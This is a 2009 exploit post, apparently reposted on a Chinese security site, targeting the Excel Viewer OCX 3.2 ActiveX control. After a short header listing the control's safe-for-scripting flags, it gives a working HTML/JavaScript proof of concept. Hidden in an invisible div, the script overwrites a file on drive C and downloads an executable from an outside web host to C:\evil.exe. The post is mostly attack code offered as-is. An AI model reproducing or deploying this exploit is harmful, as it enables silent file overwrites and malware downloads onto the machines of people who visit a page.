ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit
|
来源:www.vfcocus.net 作者:Luja 发布时间:2009-01-13
|
|
<html> <body> /* --=0-0-000000000--x==-xxxxxxxxx<br/> - Excel Viewer OCX 3.2 <br/> homepage: www.officeocx.com <br/> download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/> - RegKey Safe for Script: True<br/> - RegKey Safe for Init: True <br/> - Implements IObjectSafety: True <br/> - IDisp Safe: Safe for untrusted: caller,data <br/> - IPersist Safe: Safe for untrusted: caller,data <br/> - IPStorage Safe: Safe for untrusted: caller,data <br> - Tested on Avant Browser 11.7.21 ie 6 <br/> Vuln: <br/> 1) Arbitrary File Download [HttpDownloadFile]<br/> 2) Arbitrary file owerwrite [Save] <br/> <br/> --==0-0000000011011110=== <br/>
Propably it worst apps i ever see <br/> this is funy that It is meant as Safe for scripting <br/> They want sell it l0l <br/> ---000----------++++---------------000 <br/> Alfons Luja <br/> Pozdrawiam swoich fanóF <br/> 9002 <br/> :P <br/> 00 -0000000000000000===------------------x <br/> */<br/>
<div style="visibility:hidden;"> <object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object> <script type="text/javascript"> /* I dont know why but this code act correct only first time later it just crash ie In avant browser always is ok but it is necessary to wait a lot time to finsh loading - strange :x */
try{ var obj = document.getElementById('kupa'); var rem = "http://www.adalex.pl/motyl/motyl-radio.exe"; var loc = "C:\evil.exe"; obj.Save("C:\owerwrite.ini"); obj.HttpDownloadFile(rem,loc); } catch(err){ window.alert('Poc failed'); } </script> </div> </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|